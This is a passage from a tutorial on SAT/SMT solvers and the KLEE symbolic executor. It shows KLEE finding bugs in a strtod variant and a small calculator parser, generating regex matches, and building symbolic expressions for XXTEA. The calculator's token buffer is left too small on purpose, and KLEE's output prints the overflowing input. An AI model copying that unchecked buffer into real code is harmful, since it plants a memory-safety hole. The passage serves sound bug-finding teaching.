0) 115 break; 116 decPt = mantSize; 117 } 118 ++p; 119 } 120 121 /* 122 * Now suck up the digits in the mantissa. Use two integers to 123 * collect 9 digits each (this is faster than using floating-point). 124 * If the mantissa has more than 18 digits, ignore the extras, since 125 * they can't affect the value anyway. 126 */ 127 pExp = p; 128 p -= mantSize; 129 if (decPt < 0) 130 decPt = mantSize; 131 else 132 --mantSize; /* One of the digits was the point. 
*/ 133 134 switch (radix) { 135 default: 136 case 10: fracSz = 9; fracOff = 1000000000; powTab = powersOf10; break; 137 case 2: fracSz = 30; fracOff = 1073741824; powTab = powersOf2; break; 138 case 8: fracSz = 10; fracOff = 1073741824; powTab = powersOf8; break; 139 case 16: fracSz = 7; fracOff = 268435456; powTab = powersOf16; break; 140 } 141 if (mantSize > 2 * fracSz) 142 mantSize = 2 * fracSz; 143 fracExp = decPt - mantSize; 144 if (mantSize == 0) { 145 fraction = 0.0; 146 p = string; 147 goto done; 148 } else { 149 int frac1, frac2; 150 151 for (frac1=0; mantSize>fracSz; --mantSize) { 152 c = *p++; 153 if (c == '.') 154 c = *p++; 155 frac1 = frac1 * radix + (c - '0'); 156 } 157 for (frac2=0; mantSize>0; --mantSize) { 158 c = *p++; 159 if (c == '.') 160 c = *p++; 161 frac2 = frac2 * radix + (c - '0'); 162 } 163 fraction = (double) fracOff * frac1 + frac2; 164 } 165 166 /* 167 * Skim off the exponent. 168 */ 169 p = pExp; 170 if (*p=='E' || *p=='e' || *p=='S' || *p=='s' || *p=='F' || *p=='f' || 171 *p=='D' || *p=='d' || *p=='L' || *p=='l') { 172 ++p; 173 if (*p == '-') { 174 expSign = 1; 175 ++p; 176 } else if (*p == '+') 177 ++p; 178 while (isdigitx (*p, radix)) 179 exp = exp * radix + (*p++ - '0'); 180 } 181 if (expSign) 182 exp = fracExp - exp; 183 else 104 184 exp = fracExp + exp; 185 186 /* 187 * Generate a floating-point number that represents the exponent. 188 * Do this by processing the exponent one bit at a time to combine 189 * many powers of 2 of 10. Then combine the exponent with the 190 * fraction. 191 */ 192 if (exp < 0) { 193 expSign = 1; 194 exp = -exp; 195 } else 196 expSign = 0; 197 if (exp > maxExponent) 198 exp = maxExponent; 199 dblExp = 1.0; 200 for (i=0; exp; exp>>=1, ++i) 201 if (exp & 01) 202 dblExp *= powTab[i]; 203 if (expSign) 204 fraction /= dblExp; 205 else 206 fraction *= dblExp; 207 208 done: 209 if (endPtr) 210 *endPtr = p; 211 212 return sign ? 
-fraction : fraction;
213 }
214
215 #define BUFSIZE 10
216 int main()
217 {
218 	char buf[BUFSIZE];
219 	klee_make_symbolic (buf, sizeof buf, "buf");
220 	klee_assume(buf[9]==0);
221
222 	strtodx (buf, NULL, 10);
223 };

(https://github.com/dennis714/SAT_SMT_article/blob/master/KLEE/strtodx.c)

Interestingly, KLEE cannot handle floating-point arithmetic, but it nevertheless found something:

 ...
 KLEE: ERROR: /home/klee/klee_test.c:202: memory error: out of bound pointer
 ...
 % ktest-tool klee-last/test003483.ktest
 ktest file : 'klee-last/test003483.ktest'
 args : ['klee_test.bc']
 num objects: 1
 object 0: name: b'buf'
 object 0: size: 10
 object 0: data: b'-.0E-66\x00\x00\x00'

As it seems, the string "-.0E-66" causes an out-of-bounds array access (a read) at line 202. On further investigation, I found that the powersOf10[] array is too short: its 6th element (counting from the 0th) has been accessed. And indeed, part of the array is commented out (line 79)! Probably someone's mistake?

9.12 Unit testing: simple expression evaluator (calculator)

I was looking for a simple expression evaluator (a calculator, in other words) which takes an expression like "2+2" on input and gives the answer. I found one at http://stackoverflow.com/a/13895198. Unfortunately, it has no bugs, so I introduced one: the token buffer (buf[] at line 31) is smaller than the input buffer (input[] at line 19).

1  // copypasted from http://stackoverflow.com/a/13895198 and reworked
2
3  // Bare bones scanner and parser for the following LL(1) grammar:
4  // expr -> term { [+-] term } ; An expression is terms separated by add ops.
5  // term -> factor { [*/] factor } ; A term is factors separated by mul ops.
6  // factor -> unsigned_factor ; A signed factor is a factor,
7  //         | - unsigned_factor ; possibly with leading minus sign
8  // unsigned_factor -> ( expr ) ; An unsigned factor is a parenthesized expression
9  //                  | NUMBER ; or a number
10 //
11 // The parser returns the floating point value of the expression.
12
13 #include <stdio.h>
14 #include <stdlib.h>
15 #include <string.h>
16 #include <ctype.h>
17 #include <klee/klee.h>
18
19 char input[128];
20 int input_idx=0;
21
22 char my_getchar()
23 {
24 	char rt=input[input_idx];
25 	input_idx++;
26 	return rt;
27 };
28
29 // The token buffer. We never check for overflow! Do so in production code.
30 // it's deliberately smaller than input[] so KLEE could find buffer overflow
31 char buf[64];
32 int n = 0;
33
34 // The current character.
35 int ch;
36
37 // The look-ahead token. This is the 1 in LL(1).
38 enum { ADD_OP, MUL_OP, LEFT_PAREN, RIGHT_PAREN, NOT_OP, NUMBER, END_INPUT } look_ahead;
39
40 // Forward declarations.
41 void init(void);
42 void advance(void);
43 int expr(void);
44 void error(char *msg);
45
46 // Parse expressions, one per line.
47 int main(void)
48 {
49 	// take input expression from input[]
50 	//input[0]=0;
51 	//strcpy (input, "2+2");
52 	klee_make_symbolic(input, sizeof input, "input");
53 	input[127]=0;
54
55 	init();
56 	while (1)
57 	{
58 		int val = expr();
59 		printf("%d\n", val);
60
61 		if (look_ahead != END_INPUT)
62 			error("junk after expression");
63 		advance(); // past end of input mark
64 	}
65 	return 0;
66 }
67
68 // Just die on any error.
69 void error(char *msg)
70 {
71 	fprintf(stderr, "Error: %s. Exiting.\n", msg);
72 	exit(1);
73 }
74
75 // Buffer the current character and read a new one.
76 void read()
77 {
78 	buf[n++] = ch;
79 	buf[n] = '\0'; // Terminate the string.
80 	ch = my_getchar();
81 }
82
83 // Ignore the current character.
84 void ignore()
85 {
86 	ch = my_getchar();
87 }
88
89 // Reset the token buffer.
90 void reset()
91 {
92 	n = 0;
93 	buf[0] = '\0';
94 }
95
96 // The scanner. A tiny deterministic finite automaton.
97 int scan()
98 {
99 	reset();
100 START:
101 	// first character is digit?
102 	if (isdigit (ch))
103 		goto DIGITS;
104
105 	switch (ch)
106 	{
107 	case ' ': case '\t': case '\r':
108 		ignore();
109 		goto START;
110
111 	case '-': case '+': case '^':
112 		read();
113 		return ADD_OP;
114
115 	case '!':
116 		read();
117 		return NOT_OP;
118
119 	case '*': case '/': case '%':
120 		read();
121 		return MUL_OP;
122
123 	case '(':
124 		read();
125 		return LEFT_PAREN;
126
127 	case ')':
128 		read();
129 		return RIGHT_PAREN;
130
131 	case 0:
132 	case '\n':
133 		ch = ' '; // delayed ignore()
134 		return END_INPUT;
135
136 	default:
137 		printf ("bad character: 0x%x\n", ch);
138 		exit(0);
139 	}
140
141 DIGITS:
142 	if (isdigit (ch))
143 	{
144 		read();
145 		goto DIGITS;
146 	}
147 	else
148 		return NUMBER;
149 }
150
151 // To advance is just to replace the look-ahead.
152 void advance()
153 {
154 	look_ahead = scan();
155 }
156
157 // Clear the token buffer and read the first look-ahead.
158 void init()
159 {
160 	reset();
161 	ignore(); // junk current character
162 	advance();
163 }
164
165 int get_number(char *buf)
166 {
167 	char *endptr;
168
169 	int rt=strtoul (buf, &endptr, 10);
170
171 	// has the whole buffer been processed?
172 	if (strlen(buf)!=endptr-buf)
173 	{
174 		fprintf (stderr, "invalid number: %s\n", buf);
175 		exit(0);
176 	};
177 	return rt;
178 };
179
180 int unsigned_factor()
181 {
182 	int rtn = 0;
183 	switch (look_ahead)
184 	{
185 	case NUMBER:
186 		rtn=get_number(buf);
187 		advance();
188 		break;
189
190 	case LEFT_PAREN:
191 		advance();
192 		rtn = expr();
193 		if (look_ahead != RIGHT_PAREN) error("missing ')'");
194 		advance();
195 		break;
196
197 	default:
198 		printf("unexpected token: %d\n", look_ahead);
199 		exit(0);
200 	}
201 	return rtn;
202 }
203
204 int factor()
205 {
206 	int rtn = 0;
207 	// If there is a leading minus...
208 	if (look_ahead == ADD_OP && buf[0] == '-')
209 	{
210 		advance();
211 		rtn = -unsigned_factor();
212 	}
213 	else
214 		rtn = unsigned_factor();
215
216 	return rtn;
217 }
218
219 int term()
220 {
221 	int rtn = factor();
222 	while (look_ahead == MUL_OP)
223 	{
224 		switch(buf[0])
225 		{
226 		case '*':
227 			advance();
228 			rtn *= factor();
229 			break;
230
231 		case '/':
232 			advance();
233 			rtn /= factor();
234 			break;
235 		case '%':
236 			advance();
237 			rtn %= factor();
238 			break;
239 		}
240 	}
241 	return rtn;
242 }
243
244 int expr()
245 {
246 	int rtn = term();
247 	while (look_ahead == ADD_OP)
248 	{
249 		switch(buf[0])
250 		{
251 		case '+':
252 			advance();
253 			rtn += term();
254 			break;
255
256 		case '-':
257 			advance();
258 			rtn -= term();
259 			break;
260 		}
261 	}
262 	return rtn;
263 }

(https://github.com/dennis714/SAT_SMT_article/blob/master/KLEE/calc.c)

KLEE found the buffer overflow with little effort (65 zero digits plus one tabulation symbol):

 % ktest-tool --write-ints klee-last/test000468.ktest
 ktest file : 'klee-last/test000468.ktest'
 args : ['calc.bc']
 num objects: 1
 object 0: name: b'input'
 object 0: size: 128
 object 0: data: b'0\t0000000000000000000000000000000000000000000000000000000000000000\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff'

It's hard to say how the tabulation symbol (\t) got into the input[] array, but KLEE achieved what was desired: the buffer overflowed.
KLEE also found two expression strings which lead to a division error ("0/0" and "0%0"):

 % ktest-tool --write-ints klee-last/test000326.ktest
 ktest file : 'klee-last/test000326.ktest'
 args : ['calc.bc']
 num objects: 1
 object 0: name: b'input'
 object 0: size: 128
 object 0: data: b'0/0\x00' + 124 trailing '\xff' bytes
 % ktest-tool --write-ints klee-last/test000557.ktest
 ktest file : 'klee-last/test000557.ktest'
 args : ['calc.bc']
 num objects: 1
 object 0: name: b'input'
 object 0: size: 128
 object 0: data: b'0%0\x00' + 124 trailing '\xff' bytes

Maybe this is not an impressive result; nevertheless, it's yet another reminder that division and remainder operations must be wrapped somehow in production code to avoid possible crashes.

9.13 Regular expressions

I've always wanted to generate possible strings for a given regular expression. This is not so hard if you dive into regular-expression matcher theory and details, but can we force an RE matcher to do it for us?
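For tiny patterns the expected answers can also be enumerated directly, which is handy for cross-checking whatever a symbolic executor returns. A sketch using Python's re module on a small sample pattern (the pattern and the length-5 restriction are illustrative assumptions):

```python
import itertools
import re
import string

# Sample pattern: a digit, then one or more of a-c, then one of x/y/z.
PATTERN = re.compile(r'\d[a-c]+[xyz]')

# Enumerate every length-5 candidate of the right shape and keep full matches.
matches = [
    d + ''.join(mid) + t
    for d in string.digits
    for mid in itertools.product('abc', repeat=3)
    for t in 'xyz'
    if PATTERN.fullmatch(d + ''.join(mid) + t)
]

print(len(matches))   # 10 digits * 27 middles * 3 tails = 810
print(matches[0])     # '0aaax'
# At this length the [a-c]+ part must cover positions 1..3, so every match
# has a character from a..c at position 2 (counting from the 0th):
print(all(m[2] in 'abc' for m in matches))  # True
```

This kind of exhaustive check makes it obvious in advance which extra constraints on such a string are satisfiable and which are not.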
I took the lightest RE engine I've found, https://github.com/cesanta/slre, and wrote this:

int main(void)
{
	char s[6];
	klee_make_symbolic(s, sizeof s, "s");
	s[5]=0;

	if (slre_match("^\\d[a-c]+(x|y|z)", s, 5, NULL, 0, 0)==5)
		klee_assert(0);
}

So I wanted a string consisting of a digit, then "a"/"b"/"c" characters (at least one), and then one "x"/"y"/"z" character. The whole string must be 5 characters long.

 % klee --libc=uclibc slre.bc
 ...
 KLEE: ERROR: /home/klee/slre.c:445: failed external call: klee_assert
 KLEE: NOTE: now ignoring this error at this location
 ...
 % ls klee-last | grep err
 test000014.external.err
 % ktest-tool --write-ints klee-last/test000014.ktest
 ktest file : 'klee-last/test000014.ktest'
 args : ['slre.bc']
 num objects: 1
 object 0: name: b's'
 object 0: size: 6
 object 0: data: b'5aaax\xff'

This is indeed a correct string. "\xff" sits at the place where the terminating zero byte should be, but the RE engine we use ignores the last zero byte, because it takes the buffer length as a parameter. Hence, KLEE doesn't reconstruct the final byte.

Can we get more? Now we add an additional constraint:

int main(void)
{
	char s[6];
	klee_make_symbolic(s, sizeof s, "s");
	s[5]=0;

	if (slre_match("^\\d[a-c]+(x|y|z)", s, 5, NULL, 0, 0)==5 &&
	    strcmp(s, "5aaax")!=0)
		klee_assert(0);
}

 % ktest-tool --write-ints klee-last/test000014.ktest
 ktest file : 'klee-last/test000014.ktest'
 args : ['slre.bc']
 num objects: 1
 object 0: name: b's'
 object 0: size: 6
 object 0: data: b'7aaax\xff'

Let's say, out of whim, we don't like "a" at the 2nd position (counting from the 0th):

int main(void)
{
	char s[6];
	klee_make_symbolic(s, sizeof s, "s");
	s[5]=0;

	if (slre_match("^\\d[a-c]+(x|y|z)", s, 5, NULL, 0, 0)==5 &&
	    strcmp(s, "5aaax")!=0 &&
	    s[2]!='a')
		klee_assert(0);
}

KLEE found a way to satisfy our new constraint:

 % ktest-tool --write-ints klee-last/test000014.ktest
 ktest file : 'klee-last/test000014.ktest'
 args : ['slre.bc']
 num objects: 1
 object 0: name: b's'
 object 0: size: 6
 object 0: data: b'7abax\xff'

Let's also define a constraint KLEE cannot satisfy:

int main(void)
{
	char s[6];
	klee_make_symbolic(s, sizeof s, "s");
	s[5]=0;

	if (slre_match("^\\d[a-c]+(x|y|z)", s, 5, NULL, 0, 0)==5 &&
	    strcmp(s, "5aaax")!=0 &&
	    s[2]!='a' && s[2]!='b' && s[2]!='c')
		klee_assert(0);
}

Indeed it cannot, and KLEE finished without reporting that klee_assert() was triggered.

9.14 Exercise

Here is my crackme/keygenme, which may be tricky, but is easy to solve using KLEE: http://challenges.re/74/.

10 (Amateur) cryptography

10.1 Serious cryptography

Let's get back to the method we previously used (8.2) to construct expressions by running a Python function. We can try to build an expression for the output of the XXTEA encryption algorithm:

#!/usr/bin/env python

class Expr:
    def __init__(self,s):
        self.s=s
    def __str__(self):
        return self.s
    def convert_to_Expr_if_int(self, n):
        if isinstance(n, int):
            return Expr(str(n))
        if isinstance(n, Expr):
            return n
        raise AssertionError # unsupported type
    def __xor__(self, other):
        return Expr("(" + self.s + "^" + self.convert_to_Expr_if_int(other).s + ")")
    def __mul__(self, other):
        return Expr("(" + self.s + "*" + self.convert_to_Expr_if_int(other).s + ")")
    def __add__(self, other):
        return Expr("(" + self.s + "+" + self.convert_to_Expr_if_int(other).s + ")")
    def __and__(self, other):
        return Expr("(" + self.s + "&" + self.convert_to_Expr_if_int(other).s + ")")
    def __lshift__(self, other):
        return Expr("(" + self.s + "<<" + self.convert_to_Expr_if_int(other).s + ")")
    def __rshift__(self, other):
        return Expr("(" + self.s + ">>" + self.convert_to_Expr_if_int(other).s + ")")
    def __getitem__(self, d):
        return Expr("(" + self.s + "[" + d.s + "])")

# reworked from:
# Pure Python (2.x) implementation of the XXTEA cipher
# (c) 2009. Ivan Voras
# Released under the BSD License.
def raw_xxtea(v, n, k): def MX(): return ((z>>5)^(y<<2)) + ((y>>3)^(z<<4))^(sum^y) + (k[(Expr(str(p)) & 3)^e]^z) y = v[0] sum = Expr("0") DELTA = 0x9e3779b9 # Encoding only z = v[n-1] # number of rounds: #q = 6 + 52 / n q=1 while q > 0: q -= 1 sum = sum + DELTA e = (sum >> 2) & 3 p = 0 while p < n - 1: y = v[p+1] z = v[p] = v[p] + MX() p += 1 y = v[0] z = v[n-1] = v[n-1] + MX() return 0 v=[Expr("input1"), Expr("input2"), Expr("input3"), Expr("input4")] k=Expr("key") raw_xxtea(v, 4, k) for i in range(4): print i, ":", v[i] #print len(str(v[0]))+len(str(v[1]))+len(str(v[2]))+len(str(v[3])) Akeyischoosenaccordingtoinputdata,and,obviously,wecan’tknowitduringsymbolicexecution,so weleaveexpressionlike k[...]. Nowresultsforjustoneround,foreachof4outputs: 0 : (input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+ ((key[((0&3)^(((0+2654435769)>>2)&3))])^input4)))) 1 : (input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^ input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^((input1+ ((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^ (((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+2654435769)>>2)& 3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+ ((key[((0&3)^(((0+2654435769)>>2)&3))])^input4)))))))) 2 : (input3+(((((input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^ (((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+ ((input3>>3)^((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^ input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+ ((key[((1&3)^(((0+2654435769)>>2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4))) 
^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))))))>>5)^(input4<<2))+ ((input4>>3)^((input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^ input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^((input1+ ((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^ (((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+2654435769)>>2)&3))])^ (input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^ (((0+2654435769)>>2)&3))])^input4))))))))<<4)))^(((0+2654435769)^input4)+((key[((2&3)^(((0+2654435769)>>2)& 3))])^(input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^ 112 input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^((input1+ ((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^ (((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+2654435769)>>2)& 3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^ (((0+2654435769)>>2)&3))])^input4)))))))))))) 3 : (input4+(((((input3+(((((input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^ (((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^ ((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^ (((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+2654435769)>>2)&3))])^ (input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^ (((0+2654435769)>>2)&3))])^input4))))))))>>5)^(input4<<2))+((input4>>3)^((input2+(((((input1+((((input4>>5)^ 
(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^ input4))))>>5)^(input3<<2))+((input3>>3)^((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^ (((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+ ((key[((1&3)^(((0+2654435769)>>2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^ (((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))))))<<4)))^(((0+2654435769)^ input4)+((key[((2&3)^(((0+2654435769)>>2)&3))])^(input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^ (input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+ ((input3>>3)^((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+ ((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+2654435769) >> 2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^ (((0+2654435769)>>2)&3))])^input4))))))))))))>>5)^((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<< 4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<2))+(((input1+((((input4>>5)^ (input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^ input4))))>>3)^((input3+(((((input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+ 2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^((input1+ ((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>> 2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+2654435769)>>2)&3))])^(input1+((((input4>> 5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^ 
input4))))))))>>5)^(input4<<2))+((input4>>3)^((input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^ (input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+ ((input3>>3)^((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+ ((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+2654435769) >> 2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^ (((0+2654435769)>>2)&3))])^input4))))))))<<4)))^(((0+2654435769)^input4)+((key[((2&3)^(((0+2654435769)>>2)&3))]) ^ (input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3) ^ (((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^((input1+((((input4>>5)^(input2<<2))+ ((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^((( 0+2654435769)^input3)+((key[((1&3)^(((0+2654435769)>>2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^( input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))))))))))<<4)))^(((0+ 2654435769)^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3) ^ (((0+2654435769)>>2)&3))])^input4)))))+((key[((3&3)^(((0+2654435769)>>2)&3))])^(input3+(((((input2+(((((input1+ ((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>> 2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<< 4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+ ((key[((1&3)^(((0+2654435769)>>2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+ 2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))))))>>5)^(input4<<2))+((input4>>3)^(( 
input2+(((((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^
(((0+2654435769)>>2)&3))])^input4))))>>5)^(input3<<2))+((input3>>3)^((input1+((((input4>>5)^(input2<<2))+((
input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+
2654435769)^input3)+((key[((1&3)^(((0+2654435769)>>2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^
(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))))))<<4)))^(((0+
2654435769)^input4)+((key[((2&3)^(((0+2654435769)>>2)&3))])^(input2+(((((input1+((((input4>>5)^(input2<<2))+
((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))>>5)^
(input3<<2))+((input3>>3)^((input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^
input2)+((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))<<4)))^(((0+2654435769)^input3)+((key[((1&3)^(((0+
2654435769)>>2)&3))])^(input1+((((input4>>5)^(input2<<2))+((input2>>3)^(input4<<4)))^(((0+2654435769)^input2)+
((key[((0&3)^(((0+2654435769)>>2)&3))])^input4))))))))))))))))

The size of the expression for each subsequent output is clearly bigger (I hope I haven't made a mistake somewhere). And this is just for 1 round. For 2 rounds, the total size of all 4 expressions is 970KB. For 3 rounds, it is 115MB. For 4 rounds, I haven't enough RAM on my computer. The expressions are exploding exponentially, and there are 19 rounds. You can weigh that.

Perhaps you can simplify these expressions: there are a lot of excessive parentheses. But I'm highly pessimistic: crypto algorithms are constructed in such a way as to not have any spare operations.

In order to crack it, you could use these expressions as a system of equations and try to solve it with an SMT solver. This is called an "algebraic attack". In other words, theoretically, you can build a system of equations like MD5(x) = 12341234 ..., but the expressions are so huge that it's impossible to solve them.
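The blow-up can be reproduced in miniature. Below is a sketch with a hypothetical toy round function (not XXTEA): it builds string expressions exactly the way the Expr class above does, and because each round splices several copies of the previous expression into the new one, the length grows geometrically:

```python
# Toy demonstration of symbolic-expression blow-up.
# The "round function" here is hypothetical, invented only to show growth:
# the new x references the old x three times and the old y once, so the
# expression length grows geometrically with the number of rounds.
def toy_round(x, y):
    # Feistel-like: new x mixes both halves, new y is the old x
    return "((%s<<4)^(%s>>5)^(%s+%s))" % (x, x, y, x), x

def expr_sizes(rounds):
    x, y = "input1", "input2"
    sizes = []
    for _ in range(rounds):
        x, y = toy_round(x, y)
        sizes.append(len(x) + len(y))
    return sizes

print(expr_sizes(8))  # strictly increasing, roughly tripling per round
```

A real cipher round references its inputs many times per operation, which is exactly why the XXTEA expressions above explode even faster.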
Yes, cryptographers are fully aware of this, and one of the goals of a successful cipher is to make the expressions as big as possible, within a reasonable running time and algorithm size. Nevertheless, you can find numerous papers about breaking these cryptosystems with a reduced number of rounds: when the expression hasn't exploded yet, it is sometimes possible. This cannot be applied in practice, but such experiments produce some interesting theoretical results.

10.1.1 Attempts to break "serious" crypto

CryptoMiniSat itself exists to support the XOR operation, which is ubiquitous in cryptography.

•Bitcoin mining with a SAT solver: http://jheusser.github.io/2013/02/03/satcoin.html, https://github.com/msoos/sha256-sat-bitcoin.
•Alexander Semenov, attempts to break A5/1, etc. (Russian presentation)
•Vegard Nossum - SAT-based preimage attacks on SHA-1
•Algebraic Attacks on the Crypto-1 Stream Cipher in MiFare Classic and Oyster Cards
•Attacking Bivium Using SAT Solvers
•Extending SAT Solvers to Cryptographic Problems
•Applications of SAT Solvers to Cryptanalysis of Hash Functions
•Algebraic-Differential Cryptanalysis of DES

10.2 Amateur cryptography

This is what you can find in serial numbers, license keys, executable file packers, CTF (Capture the Flag) challenges, malware, etc. Sometimes even in ransomware (but rarely nowadays, in 2017). Amateur cryptography can often be broken using an SMT solver, or even KLEE.

Amateur cryptography is usually based not on theory, but on visual complexity: if its creator gets results which seem chaotic enough, often, one stops improving it further. This is security not even through obscurity, but through chaotic mess. It is also sometimes called "The Fallacy of Complex Manipulation" (see RFC 4086).

Devising your own crypto algorithm is a very tricky thing to do. It can be compared to devising your own PRNG. Even the famous Donald Knuth constructed one in 1959, and it was visually very complex, but, as it turned out in practice, it had a very short cycle of length 3178. [See also: The Art of Computer Programming, vol. II, page 4, (1997).]

The very first problem is that making an algorithm which can generate very long expressions is a tricky thing in itself. A common error is to use operations like XOR and rotations/permutations, which can't help much.
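The collapsing of chained operations is easy to check mechanically. Here is a minimal sketch (plain Python, arbitrary constants) verifying that chained XORs, chained additions and chained rotations each reduce to a single operation:

```python
import random

MASK = (1 << 32) - 1

def rol(x, n):
    # 32-bit rotate left
    n %= 32
    return ((x << n) | (x >> (32 - n))) & MASK

random.seed(1)
for _ in range(1000):
    x = random.getrandbits(32)
    # any chain of XOR constants is a single XOR constant:
    assert ((x ^ 0x1234) ^ 0x5678) == (x ^ (0x1234 ^ 0x5678))
    # any chain of additions is a single addition (mod 2^32):
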